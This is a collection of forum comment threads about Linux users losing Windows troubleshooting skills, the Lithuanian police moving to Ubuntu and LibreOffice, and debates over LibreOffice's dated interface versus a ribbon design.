Sure, I still have to ref cheat sheets, and keep a Raspberry Pi running PiOS with a DokuWiki that keeps a LOT of my procedures now for both linux and windows in place. It runs on an mSATA drive over USB and it works fantastically. I can SSH into it, and `sudo mc` if I need to do comparisons, or check my `cron` jobs, as well as do backups to my Western Digital NAS. Which also runs a stripped down flavor of linux (debian I think).

Do I expect to ever be a linux expert? No. And that's fine. Because I at least understand it, and have enough skill through Windows trouble shooting, to effectively work out Linux troubleshooting.

And to me? That's a good thing.
Nah. I stay pretty fresh with PoSH
More like I lost whatever relevance my Windows Sys-Admin skills had when Myscrosoft changed every single thing in Windows and where you find it... 

umm start menu? control panel? where are the fucking settings? how do you turn off this magical cpu wasting visual nonsense? I used to know... not anymore!  

I mean, they basically said "Power-Users go away! we envy crapple and will outdo ourselves to make things that don't even approximate mac-ness but are nonetheless trendy and annoying!"

UI designers should have to go instruct people door-to-door on how breaking changes work...
I think your ability to fix linux issues makes you by default a decent windows systems/server admin.  

If you can check logs (hardest part in windows is finding them and figuring out powershell grep), then you can fix just about anything.
I tell my people.i don't touch windows machine. Those are garbage. You try to help, it becomes worse. They will blame it on you.
No because I use both.
Windows does not count as IT knowledge
I fully switched away from Windows years ago and I'm having the same problem, but I do not think that's just because I rarely use it myself (outside of occasionally at work).




Since Windows Vista, stuff has increasingly being hidden away and put in illogical places. With every new windows release, it's been getting significantly worse.




Windows 10 took this to the extreme. There's like 3 control panels, and its categories etc all have quite a bit of overlap so you never know which one is in which category unless you actively learn it by hard (almost making coding an easier thing to learn lol).



Example: do you know by hard where can you find dark mode? Is it screen settings? Themes? Accessibility? I changed these settings at least a dozen times (wasting actual hours on it) and I still wouldn't know.
Being a linux user is a great excuses not to provide tech support to peasants windows users.
Yes, very much, thankfully!

Lost track of the number of Windows issues I've never had to deal with since switching.
I'd love to have a retro IT setup, I'm sure I could set up a [retro XP computer lab](https://www.youtube.com/watch?v=v8tjA8VyfvU) and I could probably find out a way to rig all clients getting 3D acceleration. I could probably even rig DirextX11.1 software to work. If the x300 has xp 64-bit drivers, I could probably run modern software that needs Windows 8.1 with Wine Direct3D hacks.


I'd love to get my feet wet with admining an XP lab. I'm sure powershell was a godsend for Unix Admins on NT. I would also imagine Windows Terminal is way better, MS should have had that since NT 3.11.
Yes.
I consider myself decent with computers, even though I'm still quite the novice. I feel like I've lost alot of windows skills as well, despite actually using it quite a bit too. Granted it's mostly for gaming but still. Just got a new computer with windows 11 and I'm so lost on what settings to change where etc etc :D
yeah. Luckily for me, the only computers in my house are all mine with Linux installed. So if someone wants something done, it will be in my way.
I can do lots of things in windows, but most of times windows won't allow those. Like you can't extend C-drive to nother drive. You can do that, but not to drive where windows lives.
Yup, its a skill that atrophies
I went the opposite, from Unix, (SCO, SUN, IBM) to Linux, (redhat) to managing a windows shop, they have slowly starting adding in Linux, but I've lost an edge from what I once knew. We now have Redhat and centOS.
No. I have doing troubleshooting on Windows for others after going to Linux. If anything, it made my ability to troubleshoot windows better as I learned how operating systems worked.
XP was the last version of Windows I actively used before switching to MacOS. Before that I’d been using it since Win 1.4 hoping it would get better. It didn’t. 

Since then I’ve been working on servers running Linux so when a new laptop was required a few years ago I figured I’d just make everything Linux and installed Ubuntu on a Thinkpad. Sigh. Never looked back.
Yes especially since I don't really do IT stuff at all anymore. 

Any time I run into a windows 8 or 10 machine I'm super lost.  It may as well be a mac. 

We recently got switched to 10 at work, but since I'm only a user I don't really have to touch anything but when I'm having to actually work on a windows 10 machine I'm spending lot of time googling stuff. 

IT actually is my background but I got a NOC job and been there for a good 10 years so if I had to go back to IT I would have a lot of brushing up to do.  I actually wanted to setup a lab environment so I can keep my skills up to date, and yeah that never really happened. :P   My last experience with windows from an IT perspective is windows XP / Server 2003. Exchange, AD, etc... from that era as well.
Same I was even versed in cmd commands to prepare a bootable flash drive for windows. But now either the problem is simple or I have to google.

At least I google different questions compared to the person and can understand the answers better. But still opening cmd and knowing only cd and dir compared to cd and ls and more feels really crushing.
Oh yea I barely even remember how to use windows anymore. It's pretty amazing just how bad and unintuitive it is, because the speed at which you can forget how it works is astounding
I live in all 3 world's (osx, windows, Linux) and I don't shit about fuck. I'm constantly googling and am somehow able to figure it out.

I started using osx barely a couple of years ago though. Its similar enough to Linux that it's not a huge hassle but it is a hassle nonetheless.
Yep same here, I can barely even navigate a Windows system anymore since switching to Fedora and Gnome
I never had any real Windows knowledge other than control panel muscle memory... if something breaks who knows? You can never trust it to be fixed by fiddling, better just reformat and reinstall. I never knew how any of the actual system administration stuff worked other than the control panel, where to find error messages, or WTF lovecraftian horror spawned the registry.

To be honest, ever since Vista (7 being Vista but a bit nicer) it feels like not much as changed in Windows, it's just harder to find buried under three layers of shit and poor conflicting UI decisions. Networking and permissions in Windows is such a nightmare and always has been. It usually works, but the controls panels are abysmal when it doesn't. Meanwhile Mac OS has had a great System Preferences app for over a decade now, and all Linux distros are hard at work creating a simple unified experience.
Yes and I enjoy it greatly!
I  duck IT questions from friends and family.  But I admit I’m not hip with the latest professional solutions for solving windows issues, and I don’t know powershell.  I can admin a server enough to get by with the help of google.
Not at all. I've been using both Windows and Linux, and plan to continue dual-booting. In fact, I still use Windows about 60% of the time.

I am prone to saying risky things in the Linux subreddit, and here's another one: Linux doesn't solve all my problems. 

- It's more straightforward to game on Windows. Although Proton and the various translation layers have gotten *really* good, it's still one extra bit of complexity I can do without. 

- I use a notebook with a track pad, and Linux's track pad experience is so far behind Windows'.

- There's something about free software that just makes it janky as hell. KDE still doesn't manage multiple displays well enough. Gnome? Forget about adding any plugins to enhance the experience.

- Windows has PowerShell. Very risky thing to say indeed, but it's better than bash, and a *single* shell obviates a *lot* of the GNU coreutils (ls, grep, rm, mv, awk, sed, curl, some more that I can't think of). If you want a terminal, there's always Windows Terminal.

As someone who still regularly uses Windows, it's not *too* hard to troubleshoot it.
itt: people proud of skill atrophy
More a cast of I never really knew how much of the windows plumbing worked in the first place.

Especially stuff like powershell...can rarely make it do what I want
I'm surprised this is a surprise, what did you expect to happen?
Yeah it’s for the best though.

My work isn’t even using Windows server for active directory… it’s just Keycloak and Azure Active directory.

Our file server isn’t even Windows, because we use an EDMS.
I'm just one person, but I just took a job supporting Windows machines and I felt like a complete dunce. Nothing in Windows makes sense to me anymore. I'm really having to re-learn everything.
Grew up on windows, took the IT course, that turned me away from windows to linux full time, i do have windows on my spare game only pc and when i do use it to play games, it's slow, buggy and annoying, but with how games are goin on linux I'm having to use it less and less which is great

I haven't actually used windows since 7 and yeah i don't even remember how to run a disc defrag anymore
But who needs to remember that crap when you have superior EXT4 or BTRFS
Switched over from Windows 98, so yeah
I actively try to avoid learning too much about windows IT, so that I won't have to do it.
Absolutely!  Most of the trouble I have is knowing exactly what I want to do and how to do it, but not knowing where the option in buried in the plethora of unintuitive system configuration pages.

The really worrying thing is the number of times I have a problem and it is fixed by either rebooting or reinstalling a program.  It is ridiculous.

Software execution shouldn't depend on which butterfly happens to be flapping its wings at that moment.
I don't even try to keep up.  I'll gladly help people with Linux issues, but I only used MS Windows for work, and was able to switch off of that before MS Win 10 was approved for use.  So, I haven't used anything newer than MS Win 7, and I lost interest in learning any more about the OS toward end of 2004, so I haven't maintained any MS Win newer than XP for anyone.

I'm honestly fine telling even family that free MS Win tech support from me simply isn't available.
I disavow any knowledge of ...

:-)

"should you or any of your IM Force be caught or killed, the secretary will disavow" ...

Well ... sometimes I *wish* I could forget.  Ugh, ... [EDLIN](https://www.reddit.com/r/ITCareerQuestions/comments/tjlw23/comment/i1mx06x/), [TSR](https://www.reddit.com/r/ITCareerQuestions/comments/tjlw23/comment/i1mwdp8/), [HMA, PROMPT $P$G](https://www.reddit.com/r/ITCareerQuestions/comments/tjlw23/comment/i1mw4uv/), ...
I never knew windows terminal commands so not much to forget for me
I really don't care honestly. I'm no longer in that field (which is why it gave me the freedom to switch to Linux). I couldn't tell you how to do things in Windows 11. Barely Windows 10. I'm assuming it's similar to Windows 7 which is the last Windows OS I ever ran and I kinda forgot some things with that dealing with my wife's old laptop the other day.
Enjoy your freedom. The last windows I used was XP. My dad has an iPhone now and I don't know shit about it. I still help him with smtp still issues, password recovery, etc. But I don't know how to use his phone or his laptop.
For me, my macOS skill has degraded. I don’t really give a shit about Windows.
I am the Mac/iPad guy at work. But work is Windows-centric. My main laptop was normally a Mac but they gave us Dells during this refresh, and I opted for Arch.


I still use Mac and iPad at home and for most of my productivity work, but I do have a gaming laptop coming in. That will probably be Arch as well. I’m current digging around a bunch of self hosted stuff to prop up and cross platform apps, so I may jump my Mac to Asahi Linux, once they finalize it.
I was not that good at troubleshooting on Windows. My modus operandi was format C and reinstall clean every now and then.

Now I'm even more clueless, but most of my family members are running fedora, my only maintenance is doing the release upgrade for them every 6 to 9 months.
I've not used any version of Windows on a regular basis since 3.1. I've effectively never had any Windows IT knowledge. The Year Of The Linux Desktop was 1995 for me. And this has actually *helped* my career to be so specialized in something. Windows guys are done a dozen. Why would you want to be one too? And I get to duck out of fixing people's virus and printer driver problems because I literally don't know. I also don't want to know. I can tell from here that it's a frustrating clusterf*ck to deal with.

AD? Exchange? SharePoint? I've heard of these things but literally never touched them. I've never had a domain admin password. It's really great!
I was the family & friend "IT guy too", but last windows I used was seven. Now when I'm asked how to do X on windows 10/11, I just send them to Google, sometimes politely. Because, well, I would do the same thing, so why don't you just do it yourself? It's not rocket science.
Yeah because Linux is way easier and it's open + a Google search will tell you what you searched for, unlike Windows which has 2 pages of malware, rogue AVs, 10 pages of "just reinstall it bro" and you gotta pull your hair out in the registry to figure out what made Windows mess up the icons again or open shortcuts with internet explorer (the most occurring shit I've heard of from my peers)
My professional training in windows was for XP, and I haven't regularly used windows since 7. 2015 or so is the last time I even had a windows system for running games efficiently... I've used linux as my main OS since 2009, and haven't run windows at all on any machine since 2015.

If I were to do break/fix type stuff on a modern windows system, I'd be a bit lost. I could probably get the job done just by analogy with 7 and XP and general computer knowledge, but I'd be frustrated the whole time. 

If you needed me to be an expert on anything system wise, I'd be boned. 

>A lot of that knowledge is just... gone.

shit, windows has had 2 major version changes since the last time I've used it casually, and 4 since the last time I had professional instruction on it. You *forgot* a few things about modern windows. I, for the most part, have not even learned what modern windows even *is*.
I have no problem using windows. Fixing it is another world though.
It’s not just that they keep hiding core functions behind useless windows, e.g. it takes 2-3 times more clicks to get to device manager under my computer and it use to be right click properties click advanced boom device manager.

Same with network adaptors try setting a fixed IP on a windows 11 machine, like trust your users ffs Microsoft, if it wasn’t for game compatability you would be gone… if Hogwarts legacy has a native Linux port It will be off my hard drive quicker then the fuel price rise.
What are your top three troubleshooting commands on linux?
Yup. But it’s useful: when my uncle asks, hey do I do whatever on mu computer, I say: sorry, I don’t really use Windows that much anymore. Win.
Most Linux users' Windows IT knowledge was not that good to begin with, even before they left Windows.

Count all people who believe unprivileged users were introduced with Vista, for instance.
Or the ones who believe that it is not possible to manage Windows from the command line (even the really basics, like they have never heard of `net` command).

Not to mention more corporate-oriented features, such as active directory or managed updates.
My what?
One of the few reasons I had to go back to Windows and use WSL.

I have to have current working knowledge for my job. Best way, is to use it everyday.

Just like how things become super easy to you when you use Linux for a year.

I've lost some of my Linux knowledge that was specific to desktop (still use servers and whatnot for work).

You forget what you don't use everyday.
Windows 11 is just a gui reskin of Windows 10 with more bloatware,if you are having trouble orienting in it you can run a VM through virt-manager or gnome boxes or whatever you fancy. Windows NT kernel for Win 10 and 11 is the same.

Basically the main difference is a fancy new MacOS/ZorinOS/KDEPlasma style taskbar/file manager with different colors instead of yellow for folders and general desktop stuff that is under the hood still Windows 10.

Also  renamed Administrative tools to System Tools for some weird reason,made a mess of the taskbar(if you want system tray icons you need to enable each one manually) and added a bunch of bloatware widgets and support for android apps if you login with your outlook account.

But basically at the core it is all the same,don't let the fancy new GUI and a bunch of GUI fluff full you.

Powershell and CMD tools still work,whatever you can't do through Powershell like remove the bloated Edge browser,you can do via CMD.

Registry is the same bloated mess as it has always been,bloatware apps are there and more in numbers,telemetry stuff like Cortana made its way into the Windows 11 as well.

&#x200B;

Also like 99% of the problems if the system is bloated and infected with malware or has the NTFS filesystem crushing are solved by either wasting time on sfc /scannow,DISM,troubleshooting drivers using safe mode via msfconfig,registry crap is edited with regedit,group policies are edited in gpedit and if you see it is a useless time dump and Windows is borked completely then just back up important stuff and install Windows 11/10 again,formatting/wiping the main SSD/HDD.

Also if the NTFS filesystem is borked and you need to get files from it any Linux Live USB will do the trick nicely like Ubuntu/Mint/Debian.

There is not much to actually do on Windows in terms of "fixing stuff" these are the same issues that were present through Windows 7,8,8,1,10 and now they just went into Win 11.
The last windows I installed on my personal hardware was 2000.
I used XP on a machine at work for a while. Didn't use windows since, neither for work not at home.
I know nothing about recent windows
I basically blame Archwiki for it.Windows doesn't really have anything like that to my knowledge.

Then again I've been on linux since 2008 full time, tbh. My windows installs are essentially my Dad's and my Mom-in-law's laptop, since I needed to put LTSB build on them.
One can consider that a good thing. Freeing space in your memory that was used for umpteen variations of how to do the same thing with every version of windows is great.    
Much easier with a system where most of the parts adhere to a similar design principle meaning their workings can be extrapolated up to a certain point.
Yes. All my windows experience ended at XP and I've never been happier. :)
I actually used this the other way, I switched in 2004ish to Ubuntu, the last windows os I used regularly was xp

Now windows feels alien to me, I get to tell people sorry I can't fix your PC I use Linux

It def slowly stopped the calls, really only help my parents anymore

The switch to Linux, combined with the cellphone revolution, has completely changed the landscape...I get annoyed if I have to open. The lid on my laptop...I can use my phone to do 99% of the thing I needed a PC for
Install WSL on all those systems so your Linux commands will work for them, or get them on Linux with Linux Mint and Ubuntu Mate
Yup.
What windows IT knowledge? I remember submitting a support ticket once for a domain controller issue and them just sending me an exe file to fix it. Wouldn't explain what it did and ultimately the answer was.... Reformat. My knowledge of double clicking and reformatting still works.
I can fully support Win7 and Win8.1. I work with Win10 at work so I'm capable enough.

Win11, though? Totally lost. I've got the basics and everything that's consistent to Win10 or whatever, but anything that's moved and new features? I'll probably be learning it with the user.

Now with KDE or Gnome on some Linux desktop? I got you fam. macOS? I got you there too.
Kinda... the last version of Windows I used was 3.11 back in 1994 or 1995. Do you think it's changed much since then?
> I just can't tell my friends to type some commands in a terminal

Why not? Both cmd and powershell can be opened easily (via Start menu, or with Ctrl+R).
Not much in my case. Windows 10 is still similiar to 7, which i moved away from. Most portable apps and fixes and workarounds on my Windows stick still work. The one to disable fast boot not anymore, sadly. Am forced to use Windows for the company now.

Though, the last few years of using W before moving to Linux, i mostly converted it to something Linux-y, so theres not that much difference. Just more facepalm with navigation-paths in settings UI, and more bloatware to disable/remove. And once i thought it a good idea, to delete the ~10GB of UWP stuff before creating a backup image. :-)
Nah, I'm as good at Windows 3.1 as I ever was.
I can't seem to find explorer shortcut I always press super+enter to get cmd and when I open task manager my soul leave me
Very true. There were days when I used to write device drivers for Windows. Now I couldn't even find the task manager in the task bar's context menu. ( Windows 11 BTW).
Not specifically windows. But my troubleshooting workflow has been dependant on terminal quite a lot.

I recently set up private dns on a friend's phone to bypass blocked sites. Once it set up I immediately think of `ping` a blocked site. I asked "do you have terminal (termux) installed?"

Although my friend got the better solution: to actually access the site via web browser ahahahhaha.
Use it or lose it.
My Windows admin knowledge began and ended with NT4/2k. I supported it reluctantly, but it did get me to move on to other jobs & I haven't touched windows in many years. I can't even help family members at this point.
I get really angry working with windows now.
My ignorance is on purpose.  Moved that part of my brain to OpenBSD.  My nogg8n us restricted to guru status on two platforms only.  Because.
Not really, but then, I didn't move from Windows, and I have to use Windows practically every day for work. I have gotten a bit rusty with MacOS, but I know the important stuff, and I know what's possible, which is key.
I use Windows machines primarily and I still think my knowledge has diminished thanks to how drastically changes happen to settings UI and the way you acces and use Windows settings. For example audio settings usually end up being a rabbit hole in Windows 7 I used to know where everything was in audio control panel. Now you go to windows settings only to find out that you need to use audio controll panel which is hidden in advanced audio settings.
I moved to Linux as my daily driver in mid 2019 and I used Windows 7 before that. So now when my friends ask help with Windows 10/11 it is so hard to help them because it feels like I don't know anything about that OS. Most of the times I just try to search some solutions online and if they doesn't work I just give up. Windows feels so closed and locked system when fixing problems comparated to Linux. On Windows there are problems that you cannot fix because OS doesn't allow you to do so. On Linux I have never faced a problem that cannot be solved by myself with some help from internet. Other thing is that is it always worth of the effort to fix something. Over all I have had less issues with Linux than with Windows. I'm using Linux Mint as my daily driver because I want that my PC just works and I can tinker with it when I want but I don't have to if I don't want. I would never move back to Windows. When you learn to use Linux, you don't want to move back to Windows.
Ofc, whenever my friends tell me they have a problem in their computer, I know how to fix it, but just forgot the steps to do it.
I had none and it’s getting worse.
Meh, Winblows will most likely go the way of the dodo, with 11; all kinds of terrible shit packed into an already shitty OS platform.

Everything important in the tech world, runs on Unix and GNU/Linux systems anyway
I am no longer capable of operating a windows machine
I used my friends windows 11 for the first time recently and felt like an idiot. I do think they've needlessly overhauled a lot of stuff though
It’s not you, it’s Microsoft

Recent revisions of Windows 10 has made it increasingly difficult to boot into “geek mode” - ie. to get a recovery command line when things go wrong. They expect their automated recovery process to fix everything it seems

I haven’t seen Win11 crash yet, but I suspect it to be a similar experience.
No because I need windows for other systems and have had to neuter windows 8.1 and 10 to daily drive. I still know too much about how windows works.

Also add android, ios, OsX plus arch and ubuntu. All that needs more than surface knowledge. 

I regularly forget and re-learn depending on how often I have to repeat a task.
Even bigger things like building system images, patching fw, etc.

Consumer-y things I just removed off my systems and never learned in the first place. So I've got no idea what happened to your windows store or gnome3 all the same.
Whats Windows?
Of course, it did – you got used to actually good system and happily forget how to deal with this mess of an OS
Nice. Same happened to me last week. Was asked to set a notebook with win10 and Office 356 up for a group to share data via business 356 and windows cloud. It took me way to long.

On the other hand i have 8 PCs running Mint , one Debian-server and two rpis running, all connected and running several automatic scripts and own written  control-programs without any problem.
Won't say diminished, but looking at my experience on Linux, the time and effort I've invested in studying GNU is dramatically high in comparison with windows. I never bothered myself by investigating the software I'm installing on the windows. Open source software has an outlook called 'trust, but verify'. Sometimes I can acknowledge it gets tedious to invest time over studying a piece of software which doesn't play an important role in improving the experience, but mostly lack of documentation makes me...ok next!
Lithuanian police has announced yesterday that they will be ditching Microsoft services in favor of Ubuntu. One department has already done so, while others have migrated from MS Office to LibreOffice. Lithuanian police, despite being one of the most trusted institutions in Lithuanian public polls at all times, is still very underpaid. The latest reform focuses on allowing the department to pay decent and respectable salaries to their officers. They say that getting rid of huge Microsoft's licensing prices will contribute greatly to that cause. As a police volunteer and hopefully soon to be a police cadet within the Lithuanian police, I am very happy to hear about this :)

> migrated from MS Office to LibreOffice

Thank god it's not Open Office again. 
It's great that Europe is open minded to software alternatives. Here in the States you don't hear about this kind of stuff.
our french police switched to ubuntu about 5 years ago I believe, it's good to see that :)
Does this mean that the Lithuanian police are [considered extremists or terrorists](http://www.trustedreviews.com/news/nsa-use-linux-or-tor-you-re-probably-a-terrorist)?
And thus begins the Year Of The Desktop (TM)
Glad to hear this. I hope my country will take this as an example, after the M$ licensing scandal https://en.wikipedia.org/wiki/Microsoft_licensing_corruption_scandal
Source?
makes me proud to be Lithuanian!
Waiting for an updated offer from their Microsoft partner...
Wow, nice. Wish we did the same thing in Lenkija, but our government is busy destroying the Constitutional Tribunal. :(
feels good man

http://i.imgur.com/5y2uiZt.png
[deleted]
This can't be right, I've heard from several experts on reddit that Linux is completely unusable on the desktop. 

I need some kind of campaign to find the correct information about this, maybe under the slogan "get the facts".
[source](http://www.policija.lt/index.php?id=38492) (only in native language, sadly)
Why? Because Linux run on potato! 
It's a bit surprising since there's 0 linux pressence in Lithuania. None of the higher education institutions offer enough linux related subjects; I've seen few dated dual-boot ubuntu machines and that's about it.

    # setenforce 1
[deleted]
I think Linux is wonderful and I understand how much convenient it is for every institution or enterprise to use it. But I don't really care about people forced politically to adopt Linux at some instance of their lives, maybe I am just a dreamer but I want a world where people choice Linux because its greatness. I insist, we don't need governments for making Linux greater than it is. 
[deleted]
It has become a popular pastime to talk about how the LibreOffice UI looks like something straight out of the 1990s.

If you are interested in improving the situation, the [design team](https://wiki.documentfoundation.org/Design/Team) welcomes you with open arms.

There is all kinds of work available: [easy hacking with Glade](https://wiki.documentfoundation.org/Design/How_to_Improve_Dialogs), deep hacking with C++, visual & psychological design and general mulling over user requests.

[A recent talk by Jan Holesovsky](https://www.youtube.com/watch?v=4zrr9zr73H8) sheds light on the current situation.

There are [~1200 open Bugzilla reports for "UI" or "ux-advise".](https://bugs.documentfoundation.org/buglist.cgi?component=UI&component=ux-advise&f9=OP&limit=0&list_id=573509&order=changeddate%2Cpriority%2Cbug_severity&product=LibreOffice&query_format=advanced&resolution=---) Take your pick and [join the team.](https://kiwiirc.com/client/irc.freenode.net/libreoffice-design)
At the very least LibreOffice needs a decent icon set that doesn't look oversized and shiny, which might be contributing to the "dated" look.
Oh, I dunno. I rather like [my UI](http://i.imgur.com/cdCEI1R.png), and consider it fairly modern.
For anyone that's scared libreoffice is introducing the ribbon just realize that the only time design gets in the way of functionality is when it's bad design.
just wait another decade and it will be back in fashion again.
From the very first slide in the linked video:

>No rigid structure

>Just do design / UX related stuff in LibreOffice, and you are part of the Design team. :-)

While I appreciate the sentiment in terms of open source contribution, that's exactly how you get bad/inconsistent design. 
I only need one thing, really.

A small, always visible search box where I can type in the functionality I need.

Want to edit page margins? Just type it in the box. Need to style that table? Type it in the box. Change my export settings? Box.

I honestly don't get why this still is not a thing in software that exposes tons of functionality. It'd cut down the time of looking for some specific functionality in the overpopulated menus by a _lot_.
One of the reasons that open office looks so dated is that the icons look old, they're inconsistent, unintuitive, and ugly.  This is obviously a subjective opinion but a few examples:

* The icons are inconsistent.  When selecting whether the letter will be bold, underlined, or in italics, open office will randomly switch from a double-story 'a' to a single story 'a'.   [[OO Icons](http://i.imgur.com/MdlMYlW.png)]
* The icons could be more descriptive: Use a Bold B for bold, an Italic I for italics, and underlined U for underline.  
* Too many randomly selected colors in the UI. 
* The icons are outlined.  That type of design makes it feel old.  It would look cleaner if they are only one color.  The icons are bulky and ugly.  Compare those same icons above with the google docs icons: [Google Docs Icons](http://i.imgur.com/I3lNywy.png)
* Too many colors in the task bar.  
* Icons are huge, taking up screen real estate.  
* Gradients tend to look dated. 
* The fonts used in icons are inconsistent (the letters use one font, the list items use another font, spell check uses another font)
* The font selection for the icons is a bad one.  
* The lines are too thick in all the line icons.  [OO align](http://i.imgur.com/qqgknl3.png)
* Many icons are difficult to understand: Shadow icon barely casts a shadow, outline looks like it would be a change color icon.  Hyperlink too zoomed in and inconsistent with the look of the other icons.  
* There's too many icons, which makes it more difficult to find the icons you use 80% of the time.  Some pre-selected icons shouldn't be there: Shadow, and outline, for example.  
* There's a dead space between the ruler and the icons. 
* The icons are not grouped, they're just all thrown out there and divided by a very subtle line.  That makes it more difficult to find an icon.  


Removing some icons, making them consistent, smaller, more modern looking, more intuitive, using less colors and no gradients/outlines, choosing better fonts for the icons, and giving each group its space would go a long way towards making open office look more modern.  And it would be very uncontroversial.  No ribbons, no removing menus.  Just keeping up with the times.
From reading this thread, it seems having a classic menu/ribbon toggle would work best?
I don't get why people think the ribbon is so bad. It actually tells you what every button in the ribbon is for, with text that labels every button, instead of just a wall of tightly-packed, tiny icons that tell me nothing.

Everyone is talking about how their muscle memory is important to them and they already know how to use the non-ribbon interface. If you just started to use keyboard shortcuts, which are an order of magnitude quicker than any toolbar/ribbon/whatever action could possibly be, you'd realize the utility of the ribbon. You can access 99% of your most frequently-used shortcuts with the keyboard shortcut even faster, and for those 1% of functions you don't have committed to memory, it's easier to find them in a ribbon than a non-ribbon.

But you can't teach old dogs new tricks, so I suppose I can see why all of you are so vehemently against it.
I don't mind simple, "1990s" look of LibreOffice. What I have problems with are bugs that cause freezes and crashes. And they are plentiful.
Just a thought. Maybe when installing/running LO for the first time, it can have a setup wizard help the user configure the buttons, toolbars, sidebar, and themes. Combine this with *optional* menu designs such as "ribbon" or "sidebar" and let the user decide how she or he wants LO to look and work.
But the 1990s look of LibreOffice is one of the reasons why I use it! :)
Am I the only one wanting a libre version of OneNote?
People think LibreOffice looks 90's? I think LibreOffice has a decently modern look.
Looks old-fashioned? I regularly have people asking how they get 'Word' to look this way (I use the flat icon set).
Actually no, what I'm tired of is the weakness of the style system.

* Direct formatting commands should create new styles, as in Microsoft Word.

* It should be possible to apply multiple styles to a single paragraph/run of text.

* It should be possible to define style rules for pairs of paragraphs. For example, it should be possible to have spacing above a “body text” paragraph, but only if the preceding paragraph is not a heading.

CSS2 did this stuff back in 1998. 17 years later, LibreOffice Writer still can't. And that's terrible.

Maybe I should learn TeX…
There seems to be a lot of hate for the Ribbon, which reminds me of the old (and still existent) hate for GNOME 3, which I never really understood with the exception of the Nautilus feature removal. Ignoring the fact that new UI doesn't necessarily mean "ribbon", allow me to contribute as someone who doesn't use word processing software that often except for the occasional paper:

(I'm writing this from Windows, so my version of LO is the Windows version. My Linux PC applies just the same though)

From a beginner's viewpoint, Libreoffice is just not that friendly to new users. [Take a look at this screenshot.](http://i.imgur.com/eEBH5Ua.png) The top row of icons, specifically: after the "redo" icon, I'm not even sure what any of those buttons do. I can infer, but I don't know for certain until I try each one out. On the other hand, [Word's ribbon has everything neatly labeled.](http://i.imgur.com/Ucv1SEr.png) I don't need to guess what a button does, with the exception of some very commonly used buttons in the Home tab, such as B/I/U, Align, and general formatting.

I'm not saying that LibreOffice's UI is complete garbage. In fact, I like how you can dock everything on the side, which uses less vertical space and more horizontal, which we seem to have more of nowadays. I specifically like how [Apple's Pages](http://www7.pcmag.com/media/images/413360-apple-pages-for-mac-interface.jpg?thumb=y) deals with it (not my screenshot, sorry for the poor quality). Though honestly, the GNOME icons have got to go. They're just too dated for a toolbar like that in 2015. It needs to fit in as something that works _with_ the UI rather than being _on top of_ the UI, if that makes sense.

I think change for the sake of change isn't always a good thing, but in this case, I feel like a change is needed. It needs to compete with Word 2013 and 2016, not Word 2003.
i don't have any problem with it, at least it doesn't have ribbons.
I prefer LibreOffice just the way it is.
It looks like I'm not the only one who wants to keep the UI as it currently is.
I really hope the "1990s" look is still available, at least as an option. It's one of the things I love about libreoffice. 
How exactly is a 90s look bad tho
FLAT THEME EVERYTHING!!!!!!!

My impression of the current state of design.
Oh great, this the next application the "new design" crowd are going to fuck up.
this is the one thing I love. every couple years I don't need to relearn where certain things are. with that said, I think libreoffice with material design would look spiffy 
Please for the love of god, do not implement a blatant copy of the MS Office UI (the current libreoffice ui is pretty much a clone of the 2002 one with some 2007 stuff sprinkled on). Be *different*. People will only use your software if you're better and you can't be better without being different. Work from a blank sheet.
And if by '90's you mean something that is easy to grok and comfortable to look at, then please, no one contribute. At least not to the UI. :)
I'm not tired of the look. It's fine... Don't go and frak it up, please...
I like the fact that it isn't completely redesigned with every release like some are.   It doesn't crash and isn't a memory hog.   Not sure if it needs a cosmetic update
No, rather I'm tired of everyone else trying to look modern and futuristic, gimping usability in the meanwhile.
I like the UI in version 5.  It seems pretty improved to me and perfectly functional and modern.
I feel like a lot of people here are throwing in their opinion like it's expert advice despite having no training or experience with anything to do with usability. 
Everyone is forgetting you can change a UI without changing the UX. I personally think a flat, modern design like [Google's material design](https://www.google.com/design/spec/material-design/introduction.html) could look really nice and really change the look and feel of everything without drastically changing the layout of everything.

I also like the ribbon concept, and I don't see why it would be an issue to include the option to choose whatever toolbar/menu style you prefer.
This entire thread:

> DAE h8 Le ribbon?????

I'd get the love of menus if they actually were arranged sensibly, like in alphabetical order. Instead, they try to group by functionality and that only makes sense after you already know where everything is. 
Newer isn't always better. I can find things under the MENUs with WORDS instead of going thru each ribbon looking for some symbol that might represent what I'm looking for.
i'm not really tired of it.  The look of LibreOffice makes sense IMHO.  

The ribbon menu's of MS Office buries a ton of useful shit that used to have a logical way to get to.  Now i need to know what the right button looks like on the right tab - it becomes this absurd exercise in memorization and Googling around.
Just install a more modern icon theme. The buttons are right where they're supposed to be. It's already way easier to use than either Word or Google Docs.
...I don't think libre office has a 1990's look? It looks better than ms office. At least I can find tools I actually need in libre office instead of having this stupid ribbon thing displaying half a dozen fonts I don't want
The 'ribbon' is NOT better than a wall of buttons - it is several walls of buttons grouped by tabs REPLACING a menu system.

For the same vertical space you choose between the ribbon or the menu.  For applications with few tools, a simplified approach, like firefox or chrome, is ok.  For very complex applications the menubar allows access to a categorised wealth of tools and options for the space of the tabbed row on the ribbon.
Please don't add a Microsoft Office Ribbon type UI.

I sort of like the 1990s UI. I don't like that Ribbon that was added to Office 2007 and up. 

Please don't make a Hamburger menu either like mobile apps have.
No. Not tired of it at all. UI change for the sake of change almost invariably results in a worse user experience. Leave it alone. It works.
To be honest, Libre Office 5 is pretty awesome
I don't care much about the UI. I want better-looking documents, for instance more modern charts in Calc (and more statistic tools), better Impress effects, better Writer default styles, and the likes.

I'm no dev, though, and can't really help due to a number of factors.
Thank you for finally attempting to shut up the FOSS publishing/editing/image software hate orgy in this sub. I can't count the number of times someone starts a flamewar about gimp or libreoffice.
They need to work on the updater.  It's there but it never seems to work.  At least not for me on Windows.  Instead I always have to download the full version and re-install.  Normally not too big a deal but the updates are quite frequent.
I'd rather see HUD for all libreoffice not just the unity setting,  rather than pseudo-polish.
I think the UI is fine especially if you use the sifr style.
I LibreOffice adopts material design and does it right I would literally die.
After reading all of the comments, I feel sick to my stomach.  Open source UX should never be focused on following commercial alternatives.  The ribbon concept of M$ Office should not be a goal of an open source office suite unless it is truly more functional.  I believe the current way is more customizable and functional.  You can add the button you use and disable the rest.
I'll never got tired of the 90s. 
deleted  ^^^^^^^^^^^^^^^^0.1040  [^^^What ^^^is ^^^this?](https://pastebin.com/FcrFs94k/09084)
No I'm not tired of it, and never will be.

That's why LibreOffice exists separately from OpenOffice.

If you get tired of the 1990's Look of it, then switch to OpenOffice.

Problem solved.
I would love it if the GUI team attempted to come up with something new based on usage statistics, user feedback and so on.
